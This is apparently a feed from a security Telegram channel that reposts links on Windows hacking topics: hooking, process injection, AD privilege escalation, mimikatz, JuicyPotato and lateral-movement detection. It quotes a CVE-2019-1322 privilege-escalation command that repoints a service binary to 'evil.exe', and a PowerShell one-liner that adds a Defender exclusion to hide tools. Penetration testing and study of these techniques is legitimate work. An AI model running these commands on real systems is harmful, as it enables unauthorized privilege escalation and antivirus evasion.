https://www.malwaretech.com/2015/01/inline-hooking-for-programmers-part-2.html
#Windows_API_Hooking
#Malware
#PoC
#Windows_API_Hooking
#Malware
#PoC
Malwaretech
Inline Hooking for Programmers (Part 2: Writing a Hooking Engine)
We’ll be writing a hooking engine using trampoline based hooks as explained in the previous article (we don’t handle relative instructions as they’re very rare, but we do use atomic write operations to prevent race conditions).
First things first, we need…
First things first, we need…
Windows Process Injection: PROPagate
https://modexp.wordpress.com/2018/08/23/process-injection-propagate/
#windows
#exploit
@sec_nerd_en
https://modexp.wordpress.com/2018/08/23/process-injection-propagate/
#windows
#exploit
@sec_nerd_en
modexp
Windows Process Injection: PROPagate
Introduction In October 2017, Adam at Hexacorn published details of a process injection technique called PROPagate. In his post, he describes how any process that uses subclassed windows has the po…
Attack Methods for Gaining Domain Admin Rights in Active Directory
https://adsecurity.org/?p=2362
#windows
#ad
@sec_nerd_en
https://adsecurity.org/?p=2362
#windows
#ad
@sec_nerd_en
Just released a new #mimikatz version to support Windows 10 1803 to bypass the Credential Guard authentication chain
https://github.com/gentilkiwi/mimikatz/releases
#windows
#mimikatz
https://github.com/gentilkiwi/mimikatz/releases
#windows
#mimikatz
A personal favorite technique post-compromise, C# PoC for executing processes with a different PPID and retrieving output
https://github.com/leoloobeek/csharp
#windows
#csharp
https://github.com/leoloobeek/csharp
#windows
#csharp
GitHub
GitHub - leoloobeek/csharp: Various C# projects for offensive security
Various C# projects for offensive security. Contribute to leoloobeek/csharp development by creating an account on GitHub.
JuicyPotato - A useful tool to Escalate from Windows Service Account to NT AUTHORITY\SYSTEM
ohpe.it/juicy-potato/
#windows
@sec_nerd_en
ohpe.it/juicy-potato/
#windows
@sec_nerd_en
Windows 10 Updates from September 2018 vs. Metasploit - Some fun with Windows Defender and Mimikatz
https://www.youtube.com/watch?v=cq-tgcmMHXU&feature=youtu.be
#windows
https://www.youtube.com/watch?v=cq-tgcmMHXU&feature=youtu.be
#windows
YouTube
Windows 10 dpdate from September 2018 vs. Metasploit
Windows 10 x86_64 ver 10..0.17134.286 build vs. Metasploit
Detecting Lateral Movements in Windows Infrastructure
http://cert.europa.eu/static/WhitePapers/CERT-EU_SWP_17-002_Lateral_Movements.pdf
#windows
#security
http://cert.europa.eu/static/WhitePapers/CERT-EU_SWP_17-002_Lateral_Movements.pdf
#windows
#security
https://sid-500.com/downloads/
Here you can find a collection of my PowerShell scripts and modules. Have fun with it!
#windows
#ps
Here you can find a collection of my PowerShell scripts and modules. Have fun with it!
#windows
#ps
SID-500.COM
Downloads
Welcome to the downloads section! Here you can find a collection of my PowerShell scripts and modules. Active Directory Domain Services Section (1.1) AD SectionDownload Alert me, if a DC is do…
Three New DDE Obfuscation Methods
https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation
#office
#windows
https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation
#office
#windows
ReversingLabs
Three New DDE Obfuscation Methods
Cisco Talos and ReversingLabs discover a new spam campaign spreading the Adwind 3.0 remote access tool (RAT), ReversingLabs details three new DDE obfuscation methods.
DbgShell - A PowerShell Front-End For The Windows Debugger Engine http://bit.ly/2O7c30o #infosec #hacking #hackers #pentesting #pentest #programming #opensource #powershell #Windows
Forwarded from امنیت اطلاعات
PowerShell: Get Last Domain Logon with Get-ADUserLastLogon
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
On modern #Windows systems one can capture traffic without sniffer, just by "netsh trace start capture=yes" command => ETL file created.
Forwarded from امنیت اطلاعات
CVE-2019-1322
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
https://twitter.com/decoder_it/status/1193496591140818944?s=20
تست نشده!
#windows
#privesc
#pentest
@sec_nerd
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
https://twitter.com/decoder_it/status/1193496591140818944?s=20
تست نشده!
#windows
#privesc
#pentest
@sec_nerd
Twitter
ap
CVE-2019-1322 as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
Add a file/folder to #Windows Defender exclusion list
C:\>powershell -exec bypass - "Add-MpPreference -ExclusionPath 'D:\EvilFolder\Tools'"
useful if you want to move #pentest tools to a Windows machine without Defender interfering
Admin UAC prompt required
#powershell #oscp
C:\>powershell -exec bypass - "Add-MpPreference -ExclusionPath 'D:\EvilFolder\Tools'"
useful if you want to move #pentest tools to a Windows machine without Defender interfering
Admin UAC prompt required
#powershell #oscp